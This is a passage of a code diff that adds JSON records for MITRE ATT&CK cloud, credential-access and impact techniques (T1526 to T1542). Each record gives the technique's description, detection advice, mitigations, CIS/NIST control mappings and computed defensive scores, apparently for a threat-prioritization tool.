+            "RA-5",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.24285714285714288,
+            "mitigation_score": 0.45454545454545453,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00012692
+    },
+    {
+        "tid": "T1526",
+        "name": "Cloud Service Discovery",
+        "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)",
+        "url": "https://attack.mitre.org/techniques/T1526",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Office 365",
+            "SaaS"
+        ],
+        "data_sources": [
+            "Cloud Service: Cloud Service Enumeration",
+            "Cloud Service: Cloud Service Metadata"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.14761904761904762,
+        "adjusted_score": 0.14761904761904762,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.047619047619047616,
+            "detection_score": 0.1
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1528",
+        "name": "Steal Application Access Token",
+        "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)",
+        "url": "https://attack.mitre.org/techniques/T1528",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "Office 365",
+            "SaaS"
+        ],
+        "data_sources": [
+            "User Account: User Account Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.6166666666666667,
+        "adjusted_score": 0.6166666666666667,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "14.1",
+            "14.2",
+            "14.3",
+            "14.6",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-10",
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "IA-8",
+            "RA-5",
+            "SA-11",
+            "SA-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3666666666666667,
+            "mitigation_score": 0.5818181818181818,
+            "detection_score": 0.13
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1529",
+        "name": "System Shutdown/Reboot",
+        "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)",
+        "url": "https://attack.mitre.org/techniques/T1529",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.09285714285714286,
+        "adjusted_score": 0.09285714285714286,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.04285714285714285,
+            "detection_score": 0.09
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1530",
+        "name": "Data from Cloud Storage Object",
+        "description": "Adversaries may access data objects from improperly secured cloud storage.\n\nMany cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)\n\nMisconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.",
+        "url": "https://attack.mitre.org/techniques/T1530",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.",
+        "platforms": [
+            "IaaS"
+        ],
+        "data_sources": [
+            "Cloud Storage: Cloud Storage Access"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.6476190476190476,
+        "adjusted_score": 0.6476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.11",
+            "3.3",
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "6.8",
+            "11.3",
+            "13.4",
+            "18.2",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-3",
+            "IA-4",
+            "IA-5",
+            "IA-6",
+            "IA-8",
+            "RA-5",
+            "SC-28",
+            "SC-4",
+            "SC-7",
+            "SI-10",
+            "SI-12",
+            "SI-15",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.5476190476190477,
+            "mitigation_score": 0.9454545454545454,
+            "detection_score": 0.11
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1531",
+        "name": "Account Access Removal",
+        "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n\nAdversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)",
+        "url": "https://attack.mitre.org/techniques/T1531",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "User Account: User Account Deletion",
+            "User Account: User Account Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1261904761904762,
+        "adjusted_score": 0.1261904761904762,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.07619047619047618,
+            "detection_score": 0.16
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1534",
+        "name": "Internal Spearphishing",
+        "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)",
+        "url": "https://attack.mitre.org/techniques/T1534",
+        "tactics": [
+            "Lateral Movement"
+        ],
+        "detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)",
+        "platforms": [
+            "Google Workspace",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {},
+        "choke_point_score": 0.30000000000000004,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1535",
+        "name": "Unused/Unsupported Cloud Regions",
+        "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)",
+        "url": "https://attack.mitre.org/techniques/T1535",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)",
+        "platforms": [
+            "IaaS"
+        ],
+        "data_sources": [
+            "Instance: Instance Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            }
+        ],
+        "cumulative_score": 0.1761904761904762,
+        "adjusted_score": 0.1761904761904762,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "SC-23"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.0761904761904762,
+            "mitigation_score": 0.07272727272727272,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1537",
+        "name": "Transfer Data to Cloud Account",
+        "description": "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ",
+        "url": "https://attack.mitre.org/techniques/T1537",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ",
+        "platforms": [
+            "IaaS"
+        ],
+        "data_sources": [
+            "Cloud Storage: Cloud Storage Creation",
+            "Cloud Storage: Cloud Storage Modification",
+            "Snapshot: Snapshot Creation",
+            "Snapshot: Snapshot Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.43333333333333324,
+        "adjusted_score": 0.43333333333333324,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.3",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "13.4"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-3",
+            "IA-4",
+            "IA-8",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.33333333333333326,
+            "mitigation_score": 0.5272727272727272,
+            "detection_score": 0.12
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1538",
+        "name": "Cloud Service Dashboard",
+        "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.",
+        "url": "https://attack.mitre.org/techniques/T1538",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Office 365"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.22380952380952382,
+        "adjusted_score": 0.22380952380952382,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.3",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "IA-2",
+            "IA-8"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.12380952380952381,
+            "mitigation_score": 0.23636363636363636
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1539",
+        "name": "Steal Web Session Cookie",
+        "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.",
+        "url": "https://attack.mitre.org/techniques/T1539",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.",
+        "platforms": [
+            "Google Workspace",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Access",
+            "Process: Process Access"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.4452380952380952,
+        "adjusted_score": 0.4452380952380952,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "6.3",
+            "14.1",
+            "14.2",
+            "14.3",
+            "14.6",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-20",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.19523809523809524,
+            "mitigation_score": 0.32727272727272727,
+            "detection_score": 0.05
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1542",
+        "name": "Pre-OS Boot",
+        "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.",
+        "url": "https://attack.mitre.org/techniques/T1542",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Drive: Drive Modification",
+            "Driver: Driver Metadata",
+            "Firmware: Firmware Modification",
+            "Network Traffic: Network Connection Creation",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1542.001",
+                "name": "Pre-OS Boot: System Firmware",
+                "url": "https://attack.mitre.org/techniques/T1542/001",
+                "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
